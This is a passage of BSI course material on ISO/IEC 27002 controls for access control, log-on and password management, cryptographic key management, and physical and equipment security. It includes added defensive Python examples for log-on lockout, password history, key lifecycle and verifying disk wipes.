of clearance levels for users which can be tied to access to information of a particular classification
should be considered as a way of identifying those users that have a business need or a business
authorisation to access and interact with information and information systems.
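Restricting a report’s rows and fields, and the menu options a user sees, according to clearance level versus classification, as an added example that is not part of the course material. The classification ordering, clearances and report rows are constructed sample data:

```python
"""Report output and menu restriction by clearance versus classification (added example)."""
from typing import Dict, List

# Constructed ordering of classification levels (higher number = more sensitive).
LEVELS = {"public": 0, "internal": 1, "confidential": 2, "restricted": 3}

# Constructed clearances; a user absent from this table is treated as 'public'.
CLEARANCE = {"alice": "confidential", "bob": "internal"}

# Constructed report: each row carries its own classification, and one field
# (margin) is classified higher than the rows that contain it.
REPORT = [
    {"customer": "Acme", "revenue": 120000, "classification": "internal"},
    {"customer": "Globex", "revenue": 80000, "classification": "confidential", "margin": 0.31},
    {"customer": "Initech", "revenue": 5000, "classification": "restricted", "margin": 0.12},
]
FIELD_CLASSIFICATION = {"margin": "restricted"}


def can_read(user: str, classification: str) -> bool:
    """A user may see information only at or below their clearance."""
    return LEVELS[CLEARANCE.get(user, "public")] >= LEVELS[classification]


def run_report(user: str, rows: List[Dict] = REPORT) -> List[Dict]:
    """Drop rows the user is not cleared for, then limit the fields in the output."""
    output = []
    for row in rows:
        if not can_read(user, row["classification"]):
            continue
        visible = {k: v for k, v in row.items()
                   if can_read(user, FIELD_CLASSIFICATION.get(k, row["classification"]))}
        output.append(visible)
    return output


def menu_for(user: str, menu: Dict[str, str]) -> List[str]:
    """Show only the menu options whose classification the user is cleared for."""
    return [option for option, classification in menu.items() if can_read(user, classification)]
```

The report case is the one the text calls out: a user cleared to run the report still must not receive rows or fields above their clearance, so the restriction is applied to the output, not only to the menu entry that launches it.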
9.4.2 Secure log-on procedures
Where required by the access control policy, access to systems and applications should be controlled
by a secure log-on procedure.
The value of the information within any system should be determined before suitable access control
methods and log-on procedures are decided upon. For example, an organization may decide it is
acceptable to access an information system which only contains non-sensitive information with a simple
username and password. Alternatively, where systems contain highly sensitive information, greater
levels of authentication may be required, such as the use of multi-factor authentication including the
use of smart cards, biometrics and tokens. As such, an organization should ensure that it designs the
log-on system appropriate to the classification of the information held within the system in order to
reduce the likelihood of an attacker gaining unauthorized access.
Adequate protection against attacks on the log-on process should be considered and built into it,
including guarding against brute force attacks by limiting the number of failed login attempts allowed.
Security information should be recorded including the number and time and date of login attempts,
whether successful or not, so that unauthorized access might be detected. Systems should not
provide an attacker with information that would help them further their attack. A good log-on
procedure should only validate the log-on information on completion of all input data. If an error
condition arises, the system should not indicate which part of the data is correct or incorrect.
Log-on procedures can also be strengthened by not transmitting passwords in clear text over a
network, by terminating inactive sessions after a defined period of inactivity, especially in high risk
locations and by restricting connection times to provide additional security for high-risk applications
and reduce the window of opportunity for unauthorized access.
Authentication information should be protected when it is stored within the system or when it is being
communicated across a network, for example through encryption techniques.
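A log-on routine implementing the points above (validation only once all input is complete, one error message that never says which part was wrong, a limit on failed attempts, an audit record of every attempt, passwords stored only in protected form, and termination of idle sessions), as an added example; it is not from the course or the standard. The user names, timings and thresholds are constructed:

```python
"""Secure log-on procedure (added example; constructed thresholds and sample users)."""
import hashlib
import hmac
import os
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

MAX_FAILED_ATTEMPTS = 5                  # brute-force limit (constructed value)
LOCKOUT = timedelta(minutes=15)          # how long failures count against a user
SESSION_IDLE_LIMIT = timedelta(minutes=10)
GENERIC_ERROR = "Invalid credentials"    # never reveals which part of the input was wrong


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Store passwords only in protected (salted, iterated-hash) form."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class LoginService:
    def __init__(self) -> None:
        self.users: Dict[str, Tuple[bytes, bytes]] = {}
        self.failed: Dict[str, List[datetime]] = {}
        self.audit: List[dict] = []                 # every attempt, successful or not
        self.sessions: Dict[str, datetime] = {}     # token -> last activity

    def add_user(self, username: str, password: str) -> None:
        self.users[username] = hash_password(password)

    def _record(self, username: str, when: datetime, success: bool) -> None:
        self.audit.append({"user": username, "time": when.isoformat(), "success": success})

    def _locked(self, username: str, now: datetime) -> bool:
        recent = [t for t in self.failed.get(username, []) if now - t < LOCKOUT]
        self.failed[username] = recent
        return len(recent) >= MAX_FAILED_ATTEMPTS

    def login(self, username: str, password: str, now: datetime) -> Tuple[bool, str]:
        """Returns (True, session token) or (False, GENERIC_ERROR)."""
        # Validation starts only once both fields have been supplied.
        if not username or not password:
            self._record(username, now, False)
            return False, GENERIC_ERROR
        if self._locked(username, now):
            self._record(username, now, False)
            return False, GENERIC_ERROR
        stored = self.users.get(username)
        # Hash even for unknown users so timing does not disclose which IDs exist.
        salt = stored[0] if stored else b"\x00" * 16
        _, candidate = hash_password(password, salt)
        ok = stored is not None and hmac.compare_digest(candidate, stored[1])
        self._record(username, now, ok)
        if not ok:
            self.failed.setdefault(username, []).append(now)
            return False, GENERIC_ERROR
        token = os.urandom(16).hex()
        self.sessions[token] = now
        return True, token

    def touch_session(self, token: str, now: datetime) -> bool:
        """Refresh a session; terminate it if it has been idle for too long."""
        last = self.sessions.get(token)
        if last is None or now - last > SESSION_IDLE_LIMIT:
            self.sessions.pop(token, None)
            return False
        self.sessions[token] = now
        return True
```

An unknown user ID, a wrong password and a locked-out account all receive the same message, so the response itself gives nothing away; the audit list is where the number, time and outcome of attempts are kept for detection. Not transmitting the password in clear text is a transport matter (e.g. TLS) outside this snippet.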
9.4.3 Password management system
Password management systems should be interactive and should ensure quality passwords.
A management system should be implemented to ensure that whenever passwords are chosen for a
user, the password is unique, is of sufficient length, quality and complexity. The management system
should force passwords to be changed upon first use of the password if the password was not set by
the user and force passwords to be changed regularly thereafter to reduce the window of opportunity
for a password to be discovered. Passwords should not be displayed when entered into a system and
a record of previously used passwords should be kept to ensure that the user is not able to repeat
the same password. A password management system can also improve security by storing password
files separately from application system data, as well as storing and transmitting passwords in
protected form.
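The password checks described in 9.3.1 (not based on the username, free of easy-to-research information, not a dictionary word, no consecutive identical characters, not all-numeric or all-alphabetic), the history and forced-change rules of 9.4.3, and the temporary password of 9.2.4, combined into one password management routine. This is an added example and not the course’s or the standard’s own material; the length threshold, history depth, word list and the sample user’s details are constructed:

```python
"""Password quality, history and temporary-password handling (added example)."""
import hashlib
import hmac
import os
import secrets
import string
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

MIN_LENGTH = 12          # constructed threshold
HISTORY_DEPTH = 12       # how many previous passwords are remembered (constructed)
# Constructed stand-in for a real dictionary / common-password list.
DICTIONARY = {"password", "welcome", "letmein", "qwerty", "sunshine"}


def _hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Previously used passwords are kept only as salted, iterated hashes."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


@dataclass
class UserPasswordState:
    username: str
    personal_facts: List[str]                   # names, dates an attacker could research
    history: List[Tuple[bytes, bytes]] = field(default_factory=list)
    must_change: bool = True                    # true until the user sets their own password


def quality_problems(state: UserPasswordState, candidate: str) -> List[str]:
    """Every rule from the guidance that the candidate breaks; empty means acceptable."""
    problems = []
    lowered = candidate.lower()
    if len(candidate) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if state.username.lower() in lowered:
        problems.append("based on the username")
    for fact in state.personal_facts:
        if fact.lower() in lowered:
            problems.append(f"contains easy-to-research information ({fact})")
    if lowered in DICTIONARY:
        problems.append("dictionary word")
    if candidate.isdigit():
        problems.append("all-numeric")
    if candidate.isalpha():
        problems.append("all-alphabetic")
    if any(a == b for a, b in zip(candidate, candidate[1:])):
        problems.append("consecutive identical characters")
    for salt, digest in state.history:
        if hmac.compare_digest(_hash(candidate, salt)[1], digest):
            problems.append("previously used")
            break
    return problems


def set_password(state: UserPasswordState, candidate: str) -> List[str]:
    """Accept the candidate only if it passes every check; otherwise return the problems."""
    problems = quality_problems(state, candidate)
    if problems:
        return problems
    state.history.append(_hash(candidate))
    del state.history[:-HISTORY_DEPTH]          # keep only the most recent entries
    state.must_change = False
    return []


def issue_temporary_password(state: UserPasswordState) -> str:
    """Unguessable, per-user temporary secret that must be changed on first use."""
    alphabet = string.ascii_letters + string.digits
    temp = "".join(secrets.choice(alphabet) for _ in range(16))
    state.history.append(_hash(temp))
    state.must_change = True
    return temp
```

Because the history holds only salted hashes, a compromise of the password management system’s own store does not hand over the user’s earlier passwords, and the must_change flag is what turns ‘forced to change on first use’ into something the log-on process can check.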
9.4.4 Use of privileged utility programs
The use of utility programs that might be capable of overriding system and application controls
should be restricted and tightly controlled.
Modern computer systems often come pre-loaded with powerful utility programs and other utility
programs may be installed by the IT department in order to perform automated tasks.
These utility programs often require heightened privileges to perform their tasks and can often
override system and application security controls. As a consequence, access to the use of these utility
programs should be restricted to those who require it for their roles to ensure that they are not
misused and also to enable monitoring to take place.
9.4.5 Access control to program source code
Access to program source code should be restricted.
Wherever the organization is involved in application and system development, care should be taken
to ensure that unauthorized access to source code and other materials such as plans, drawings and
specifications is prevented to ensure that unauthorized changes cannot be made as well as to ensure
the confidentiality of intellectual property. For example, unauthorized access to program source code
could lead to the introduction of unwanted program functionality or malicious software (malware)
such as trap doors and back doors. Program source libraries should be kept under change control
and restrictions placed on the ability to copy them. Access to program source libraries should be
monitored and reviewed. Program listings should be held in a secure environment.
10.1 Cryptographic controls
Objective: To ensure proper and effective use of cryptography to protect the confidentiality,
authenticity and/or integrity of information.
10.1.1 Policy on the use of cryptographic controls
A policy on the use of cryptographic controls for protection of information should be developed and
implemented.
The organization, when considering the value of the information assets under its control, should
ensure that it identifies the need for restricting access to such information to protect its
confidentiality, integrity, non-repudiation and authentication. Access can be restricted through the
use of access controls (see Section 9), but to ensure that confidentiality can be maintained even
when access restrictions fail, the use of cryptographic technology should be considered.
When developing a cryptographic policy the following should be considered:
• Management approach towards the use of cryptographic controls across the organization
• Following a risk assessment, the type, strength and quality of the encryption algorithm required
• The protection of information transported by mobile or removable media devices
• The approach to key management, including methods to deal with the protection of cryptographic
keys
• Roles and responsibilities in implementing the policy and for key management
• Standards to be adopted for implementing across the organization
• The impact of using encrypted information on controls that rely upon content inspection (e.g.
malware detection)
Making a decision as to whether a cryptographic solution is appropriate should be seen as part of the
wider process of risk assessment and selection of controls. This assessment can then be used to
determine whether a cryptographic control is appropriate, what type of control should be applied and
for what purpose and business processes. Where cryptographic technology is implemented, the
organization should ensure that it is reliable and cannot itself be compromised. Care should be taken
though where constant access to information is required and some encryption technology may slow
processes down.
A policy on the use of cryptographic controls is necessary to maximize the benefits and minimize the
risks of using cryptographic techniques and to avoid inappropriate or incorrect use.
Cryptographic techniques can be used to meet other information security objectives. For example
nonrepudiation can be achieved through the use of cryptographic or digital signatures and the integrity
of information can be assured through the use of one way hashing functions.
10.1.2 Key management
A policy on the use, protection and lifetime of cryptographic keys should be developed and
implemented through their whole lifecycle.
Wherever cryptographic techniques are used to protect information, suitable management and
protection of the associated keys is paramount if the system is not to be compromised. There are a
number of elements of key management to consider throughout the lifecycle of the keys, which include:
• Key generation
• Key distribution
• Key storage
• Key updates and changes
• Key compromise
• Key revocation
• Key recovery
• Key archiving and backups
• Key destruction
• Key audit logging (logging of the activities associated with the use of keys)
In order to reduce the likelihood of improper use, activation and deactivation dates for keys should be
defined so that the keys can only be used for the period of time defined in the associated key
management policy.
The use of public key infrastructure should also be considered part of key management as it is used to
authenticate the public key in public key cryptography systems through the issuing of certificates.
All of these items should have policies implemented and documented to state what the requirements
are for each stage within the business. Where necessary, these policies should be underpinned with
documented processes and procedures to ensure key management is implemented in a reliable,
repeatable and effective manner.
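The key lifecycle elements listed above, with activation and deactivation dates, key states and an audit log, together with the integrity use of a keyed one-way hash mentioned under 10.1.1, as an added example that is not from the course or the standard. Key identifiers, dates and the protected message are constructed, and HMAC-SHA256 stands in for whichever algorithm a risk assessment would select:

```python
"""Cryptographic key lifecycle with activation dates, states and an audit log (added example)."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Optional, Tuple


@dataclass
class ManagedKey:
    key_id: str
    material: Optional[bytes]      # None once destroyed
    not_before: date               # activation date
    not_after: date                # deactivation date
    state: str = "active"          # active -> deactivated -> destroyed; compromised at any point


class KeyStore:
    def __init__(self) -> None:
        self._keys: Dict[str, ManagedKey] = {}
        self.audit: List[Tuple[str, str]] = []     # (key_id, event): the key audit log

    def _log(self, key_id: str, event: str) -> None:
        self.audit.append((key_id, event))

    def generate(self, key_id: str, not_before: date, not_after: date) -> ManagedKey:
        if key_id in self._keys:
            raise ValueError(f"key ID {key_id} already exists")
        key = ManagedKey(key_id, secrets.token_bytes(32), not_before, not_after)
        self._keys[key_id] = key
        self._log(key_id, "generated")
        return key

    def _for_protect(self, key_id: str, today: date) -> ManagedKey:
        key = self._keys[key_id]
        if key.state != "active":
            raise PermissionError(f"key {key_id} is {key.state}")
        if not (key.not_before <= today <= key.not_after):
            raise PermissionError(f"key {key_id} is outside its activation period")
        return key

    def protect(self, key_id: str, data: bytes, today: date) -> bytes:
        """Integrity tag over data; only an active key inside its dates may be used."""
        key = self._for_protect(key_id, today)
        self._log(key_id, "protect")
        return hmac.new(key.material, data, hashlib.sha256).digest()

    def verify(self, key_id: str, data: bytes, tag: bytes) -> bool:
        """Deactivated keys may still verify old data; compromised or destroyed keys never."""
        key = self._keys[key_id]
        if key.state not in ("active", "deactivated"):
            raise PermissionError(f"key {key_id} is {key.state}")
        self._log(key_id, "verify")
        return hmac.compare_digest(hmac.new(key.material, data, hashlib.sha256).digest(), tag)

    def rotate(self, old_id: str, new_id: str, not_before: date, not_after: date) -> ManagedKey:
        """Key update: deactivate the old key and generate its replacement."""
        self._keys[old_id].state = "deactivated"
        self._log(old_id, "deactivated")
        return self.generate(new_id, not_before, not_after)

    def mark_compromised(self, key_id: str) -> None:
        self._keys[key_id].state = "compromised"
        self._log(key_id, "compromised")

    def destroy(self, key_id: str) -> None:
        key = self._keys[key_id]
        key.material = None
        key.state = "destroyed"
        self._log(key_id, "destroyed")

    def state_of(self, key_id: str) -> str:
        return self._keys[key_id].state
```

The design choice worth noting is that a deactivated key can still verify but no longer protect: data tagged during the key’s active period remains checkable after rotation, while no new use is possible, and a key marked compromised is refused for both so that nothing protected under it is trusted.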
11.1 Secure areas
Objective: To prevent unauthorized physical access, damage and interference to the organization’s
information and information processing facilities.
Physical security is just as important as logical security to ensure the confidentiality, integrity and
availability of information assets and the places and facilities within which they are stored, handled,
processed and transmitted.
Physical protection can be achieved through a variety of different measures and ‘layers’. For example,
the use of internal access controlled doors would give protection in the event that an external entrance
door was compromised.
The application of physical controls should be adapted based on appropriate technology, cost and risk.
11.1.1 Physical security perimeter
Security perimeters should be defined and used to protect areas that contain either sensitive or critical
information and information processing facilities.
Security perimeters should be used to protect areas that contain either sensitive or critical information
and information processing facilities. The siting and strength of each perimeter control should depend
on the security requirements and risks associated with the assets within the perimeter to be protected.
The perimeters of a building or site containing information processing facilities should be physically
sound (i.e. there should be no gaps in the perimeter or areas where a break-in could easily occur).
The exterior roof, walls and flooring of the site should be of solid construction and all external doors
should be suitably protected against unauthorized access with control mechanisms, (e.g. bars, alarms,
locks). Additional barriers and perimeters to control physical access may be needed between areas
with different security requirements inside the security perimeter, particularly where premises are
multi-tenanted with different organizations.
Doors and windows should be locked when unattended and external protection should be considered
for windows, particularly at ground level. Fire doors on a security perimeter should be alarmed,
monitored and tested in accordance with suitable regional, national and International Standards; they
should operate in accordance with the local fire regulations in a failsafe manner.
Organizations should consider installation of suitable intruder detection systems to cover all external
access and egress points and conform to appropriate national, regional or international standards.
Where installed, intruder detection systems should be regularly tested. Unoccupied areas should,
where practical, be alarmed at all times. Intruder detection cover should also be provided as
appropriate to other secure areas, e.g. computer room or communications rooms. Where information
processing facilities are managed by the organization they should be physically separated from those
managed by external parties.
11.1.2 Physical entry controls
Secure areas should be protected by appropriate entry controls to ensure that only authorized
personnel are allowed access.
Secure areas can be self-contained lockable rooms or several rooms surrounded by a continuous
internal physical security barrier.
Secure areas should be protected by appropriate entry controls to ensure that only authorized
personnel are allowed access. Physical entry controls should include provisions for the following:
• Physical or electronic log audit trail maintained for all physical access to premises
• Visible identification worn by all employees, contractors and external parties, creating the ability to
identify, report and challenge unauthorized personnel
• Access control to areas where confidential information is processed or stored should be restricted
to authorized individuals by implementing appropriate access controls, e.g. by implementing a
two-factor authentication mechanism such as an access card and secret PIN
• Visitor management, including appropriate verification of visitor identity, recording the date and
time of entry and departure of visitors, and visitor supervision; visitor access should only be granted
for specific, authorized purposes and visitors should be issued with instructions on the security
requirements of the area and on emergency procedures
• Restriction and monitoring of access by external party support service personnel: they should be
granted restricted access to secure areas or confidential information processing facilities only when
required, and this access should be authorized and monitored
• Access rights to secure areas should be regularly reviewed and updated, and revoked when
necessary (see 9.2.5 and 9.2.6)
11.1.3 Securing offices, rooms and facilities
Physical security for offices, rooms and facilities should be designed and applied.
ISM02101ENGX v2.0 Nov 2017
Copyright © 2017 BSI. All rights reserved.
56
BSI Group (Thailand) Co., Ltd
127/29 Panjathani Tower, 24th Floor, Nonsee Road, Chongnonsee, Yannawa, Bangkok 10120, Thailand
Tel : 0-2294 - 4889 - 92 Fax: 0-2294 – 4467 | www. bsigroup.com | infothai@bsigroup.com
In securing offices, rooms and facilities, organizations should:
• Protect the storage of keys and other access tokens, ensuring they are only accessible to authorized
personnel and appropriately identified and accounted for
• Depending on the risk profile of the facilities, consider minimizing signage indicating their occupation
or purpose. Internal layout is important to prevent confidential information or activities being visible
and audible from the outside. Control provisions may include appropriate window coverings or
dressings. Electromagnetic shielding may also be considered as appropriate
• Consider appropriately restricting access to information held within personnel directories (e.g. global
address lists and internal telephone books) identifying locations of confidential information
processing facilities
11.1.4 Protecting against external and environmental threats
Physical protection against natural disasters, malicious attack or accidents should be designed and
applied.
Physical protection against external and environmental threats including natural disasters, malicious
attack or accidents should be designed and applied. Specialist advice may need to be sought in relation
to protection from threats such as fire, earthquake, explosion and civil unrest.
11.1.5 Working in secure areas
Procedures for working in secure areas should be designed and applied
Personnel should only be aware of the existence of, or activities within, a secure area on a need-to-know basis. Unsupervised working in secure areas should be avoided both for safety reasons and to
prevent opportunities for malicious activities. Vacant secure areas should be physically locked and
periodically reviewed. Organizations should consider a policy and, as appropriate, prohibition measures
or authorization procedures for the use of photographic, video, audio or other recording equipment,
such as cameras within mobile devices.
11.1.6 Delivery and loading areas
Access points such as delivery and loading areas and other points where unauthorized persons could
enter the premises should be controlled and, if possible, isolated from information processing facilities
to avoid unauthorized access.
Access points such as delivery and loading areas and other points where unauthorized persons could
enter the premises should be controlled, if possible, with access restricted to identified and authorized
personnel and/or isolated from information processing facilities to avoid unauthorized access. This
should include implementing measures such as the installation of physical barriers (e.g. cages or dual
shutter doors) so that supplies can be loaded and unloaded without delivery personnel gaining access
to other parts of the building.
Incoming material should be inspected and examined for evidence of tampering en route, for
explosives, chemicals or other hazardous materials, before it is moved from a delivery and loading area,
with procedures to report and deal with suspect packages. Goods in and out should be registered
(upon receipt into and removal from the loading area) in accordance with asset management
procedures (see Clause 8) and incoming and outgoing goods should be physically segregated, where
possible, to enable easy identification and tracking of items.
11.2 Equipment
Objective: To prevent loss, damage, theft or compromise of assets and interruption to the
organization’s operations.
11.2.1 Equipment siting and protection
Equipment should be sited and protected to reduce the risks from environmental threats and hazards,
and opportunities for unauthorized access.
In order to prevent the loss, damage or theft of assets, reduce the risks posed by environmental
threats (e.g. theft, fire, explosives, smoke, water, lightning, dust, vibration, chemical effects,
communications interference and electromagnetic radiation) and minimize interruption to the
organization's operations, measures need to be implemented to carefully locate and protect assets.
Equipment should be located or sited so that access can be limited on a ‘least necessary’ basis.
Equipment storing or processing sensitive data should be positioned carefully to reduce the risk of
information being viewed by unauthorized persons.
Alongside physical access controls described within 11.1 to prevent unauthorized access, any specific
items requiring special protection should be appropriately safeguarded. Such protection may be
achieved through a wide ranging variety of measures, examples include installation of lockable server
cabinets and zonal alarms.
Environmental protection controls (in addition to the controls outlined within 11.1.4) may
include the installation of specific fire suppression systems, water pumps, structural strengthening,
building lightning protection, equipment dust protection, temperature and humidity monitoring and
the provision of guidelines on the use of information processing facilities, such as rules on eating,
drinking and smoking.
11.2.2 Supporting utilities
Equipment should be protected from power failures and other disruptions caused by failures in
supporting utilities.
Equipment should be protected from power failures and other disruptions caused by failures in
supporting utilities (e.g. telecommunications, water supply, gas, sewage, ventilation and air
conditioning). Again, a variety of measures can be taken to avoid failure and disruption of supply of
supporting utilities, ranging from ensuring that equipment meets the manufacturer’s specifications
and local legal requirements, managing its capacity, monitoring its functionality and conducting
regular inspections to ensure it is in proper working order, to making provisions for alternative
supplies, such as through provision of emergency lighting, multiple communications and/or network
connectivity feeds, access to multiple energy or communications providers, installation of
uninterruptible power supply (UPS) units and/or on-site power generators.
11.2.3 Cabling security
Power and telecommunications cabling carrying data or supporting information services should be
protected from interception, interference or damage.
Organizations should ensure that power and telecommunications cabling carrying data or supporting
information services is protected from interception, interference or damage.
Power and telecommunications lines into information processing facilities should be underground
where possible, or subject to adequate alternative protection, such as shielded overhead gantries.
Consideration should be given to possible interference between power cables and communications
cabling, and the two should be segregated as necessary.
Additional measures to be considered for the protection of sensitive or critical systems may include
measures such as installation of armoured cabling conduit, locked rooms or boxes at inspection and
termination points and the use of electromagnetic shielding to protect the cables. It may also be
necessary to undertake technical sweeps and/or physical inspections for unauthorized devices being
attached to the cables.
11.2.4 Equipment maintenance
Equipment should be correctly maintained to ensure its continued availability and integrity.
Equipment should be correctly maintained, in accordance with the supplier's recommended service
intervals and specifications and with regulatory and insurers' requirements, and maintenance should
be carried out by authorized maintenance personnel.
Where equipment requires ongoing maintenance, schedules should be put in place to ensure
necessary maintenance work is carried out in a timely manner and appropriate records are kept,
including records of suspected or actual faults as well as preventive and corrective maintenance
activities undertaken. Before putting equipment back into operation after its maintenance, it may
need to be inspected to ensure that the equipment has not been tampered with and does not
malfunction.
11.2.5 Removal of assets
Equipment, information or software should not be taken off-site without prior authorization.
Organizations should implement policy provisions to ensure that all personnel understand the rules
concerning removal of assets from its premises, the authorities required for removal of assets and
the associated procedures. Where necessary and appropriate, assets should be recorded when removed
off-site and when returned, and where appropriate time limits for asset removal should be set and
returns verified against them. Procedures for asset removal should, as appropriate to the risk of
removing the asset, include provisions to record and/or verify the identity, role and affiliation of
anyone who handles or uses the removed asset, with this documentation returned with the equipment,
information or software.
Spot checks, where needed to detect unauthorized removal of assets, can also be used to prevent
unauthorized assets being brought onto the premises, such as recording devices or weapons. Such
spot checks should be carried out in accordance with relevant legislation and regulations. Individuals
should be made aware that spot checks are carried out, and the checks should only be performed with
authorization appropriate to the legal and regulatory requirements.
11.2.6 Security of equipment and assets off-premises
Security should be applied to off-site assets taking into account the different risks of working outside
the organization’s premises.
Assets are commonly used away from the organization’s premises and any information-storing and
processing equipment being used outside the organization’s premises should be authorized by
management. This applies both to equipment owned by the organization and to equipment owned
privately and used on behalf of the organization.
The protection of off-site equipment should include considerations for the physical and environmental
security of assets. Controls for home-working, teleworking and use of temporary sites should be
determined by a risk assessment and applied as appropriate. For example, assets should not be left
unattended in public spaces and line of sight should be maintained with computing
devices when travelling. Other physical and environmental premises security controls to be
considered include secure physical storage, clear desk policy, access controls for computers and
secure communication with the office (see also ISO/IEC 27033[15][16][17][18][19]). Risks of
damage, theft or eavesdropping, may vary considerably between locations and should be taken into
account in determining the most appropriate controls. More information on protecting mobile
equipment can be found in 6.2.
When off-premises equipment is transferred among different individuals or external parties, it may be
necessary to maintain a log that defines the chain of custody for the equipment including at least
names and organizations of those who are responsible for the equipment.
11.2.7 Secure disposal or re-use of equipment
All items of equipment containing storage media should be verified to ensure that any sensitive data
and licensed software has been removed or securely overwritten prior to disposal or re-use.
Organizations remain responsible for data beyond the disposal of the assets that store or process it.
Data can be compromised through careless disposal or re-use of equipment. It is, therefore, vital to
check that any sensitive data or licensed software has been removed or securely overwritten prior to
disposal or re-use of equipment. Storage media containing confidential or copyrighted information should
be physically destroyed, or the information should be destroyed, deleted or overwritten using techniques
that make the original information non-retrievable. Techniques for securely overwriting storage media
differ according to the storage media technology; overwriting tools should be reviewed to make sure that
they are applicable to the technology of the storage media (for example, a multi-pass overwrite designed
for magnetic disks does not reliably reach every cell of flash-based media, where a firmware secure-erase
or cryptographic erase is the appropriate technique).
Damaged equipment containing storage media may require a risk assessment to determine whether the
items should be physically destroyed rather than sent for repair or discarded.
In addition to secure disk erasure, whole-disk encryption reduces the risk of disclosure of confidential
information when equipment is disposed of or redeployed, provided that the:
• Encryption process is sufficiently strong and covers the entire disk
• Encryption keys are long enough to resist brute force attacks
• Encryption keys are themselves kept confidential
For further information on encryption see Clause 10.
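The following is an added example and is not part of ISO/IEC 27002 or the BSI course material: a Python check a practitioner can run after an overwrite to confirm that the media reads back as wiped, covering the verification step the guidance above asks for. It assumes the sanitized media is presented as a raw image file or block device readable in 4 KiB blocks; the function names, thresholds and the image produced by demo_image() are assumptions made for the example.

```python
"""Post-wipe verification of a raw image or block device.

Added example; not part of ISO/IEC 27002 or the BSI course. It assumes the
sanitized media can be read as a flat sequence of 4 KiB blocks. A block is
accepted only if it is zero-filled or looks like random/encrypted fill;
anything else is reported as residual data.
"""
import math
import os
import random
from dataclasses import dataclass

BLOCK_SIZE = 4096


@dataclass
class Finding:
    offset: int   # byte offset of the suspicious block
    reason: str


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, close to 8.0 for random data."""
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def longest_printable_run(data: bytes) -> int:
    """Length of the longest run of printable ASCII; text fragments survive poor wipes."""
    run = best = 0
    for b in data:
        if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D):
            run += 1
            best = max(best, run)
        else:
            run = 0
    return best


def classify_block(data: bytes, text_run_limit: int = 32) -> str:
    """Return "" when the block is consistent with a wipe, otherwise the reason it is not."""
    if not data or data.count(0) == len(data):
        return ""                                   # zero overwrite
    if shannon_entropy(data) > 7.8:
        return ""                                   # random overwrite or ciphertext (crypto-erase)
    if longest_printable_run(data) >= text_run_limit:
        return "printable text run"
    return "structured non-random data"


def sample_offsets(size: int, sample_blocks: int, seed: int) -> list[int]:
    """First block, last block and a seeded random sample of blocks in between."""
    n_blocks = size // BLOCK_SIZE
    if n_blocks == 0:
        return []
    rng = random.Random(seed)
    chosen = {0, n_blocks - 1}
    while len(chosen) < min(sample_blocks, n_blocks):
        chosen.add(rng.randrange(n_blocks))
    return sorted(i * BLOCK_SIZE for i in chosen)


def verify_image(image: bytes, sample_blocks: int = 64, seed: int = 0) -> list[Finding]:
    findings = []
    for off in sample_offsets(len(image), sample_blocks, seed):
        reason = classify_block(image[off:off + BLOCK_SIZE])
        if reason:
            findings.append(Finding(off, reason))
    return findings


def verify_device(path: str, sample_blocks: int = 64, seed: int = 0) -> list[Finding]:
    """Same check against a file or block device, e.g. verify_device("/dev/sdb")."""
    findings = []
    with open(path, "rb") as fh:
        fh.seek(0, os.SEEK_END)                     # os.path.getsize() reports 0 for block devices
        size = fh.tell()
        for off in sample_offsets(size, sample_blocks, seed):
            fh.seek(off)
            reason = classify_block(fh.read(BLOCK_SIZE))
            if reason:
                findings.append(Finding(off, reason))
    return findings


def demo_image() -> bytes:
    """Constructed 1 MiB image: zero-wiped except block 17 (leftover payroll text)
    and block 200 (random fill, which a correct random overwrite also produces)."""
    blocks = [bytes(BLOCK_SIZE)] * 256
    leftover = b"Payroll export 2017-11: employee 1042, grade 7, salary band C\n"
    blocks[17] = (leftover * (BLOCK_SIZE // len(leftover) + 1))[:BLOCK_SIZE]
    rng = random.Random(1)
    blocks[200] = bytes(rng.getrandbits(8) for _ in range(BLOCK_SIZE))
    return b"".join(blocks)


def demo() -> list[Finding]:
    # Full scan (256 of 256 blocks); a 64-block sample could miss block 17.
    return verify_image(demo_image(), sample_blocks=256)


if __name__ == "__main__":
    for f in demo():
        print(f"block at offset {f.offset}: {f.reason}")
```

Two caveats apply when using a check of this kind. Sampling can miss isolated remnants, so the scan should cover every block (or at least every block that held classified data) before media leaves the organization's control. And the entropy test accepts any near-uniform byte distribution, including a leftover encrypted volume whose key is still recoverable, so the check complements, rather than replaces, confirming that the wiping tool matches the media technology.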
11.2.8 Unattended user equipment
Users should ensure that unattended equipment has appropriate protection.
All users should be made aware of the security requirements and procedures for protecting unattended
equipment, as well as their responsibilities for implementing such protection. Users' responsibilities when
leaving equipment unattended should include:
• Logging off unneeded applications or network services
• Ensuring their device is locked and/or active user sessions are terminated
Whilst automated device lock screen controls may be enabled, these should not be relied upon by users.
11.2.9 Clear desk and clear screen policy
A clear desk policy for papers and removable storage media and a clear screen policy for information
processing facilities should be adopted.
A clear desk/clear screen policy reduces the risks of unauthorized access, loss of and damage to information
during and outside normal working hours and protects users who are accountable for their own use of
equipment and network services.
An organization’s clear desk (e.g. for paper or electronic storage media) and clear screen policy should take
into account its information classifications (see 8.2), based on legal and contractual requirements (see
18.1), organizational risks and culture.
Clear desk and clear screen provisions should ensure that sensitive or critical business information is
appropriately locked away when not required or when the office is unattended.
Use of printers, scanners, copiers (and any other form of reproduction technology) should be controlled and
restricted to authorized users (such as through the use of follow-me printing or other forms of device user
authentication), and printed material should be removed from printers immediately.
Activity 6: Access control
Purpose:
Select controls from Clauses 9, 10 and 11 of ISO/IEC 27002 to protect information assets against
unauthorized access
Duration:
25 minutes in pairs
15 minutes feedback and discussion
Directions:
Using the table over the page and working in pairs, identify 2 controls taken from anywhere within
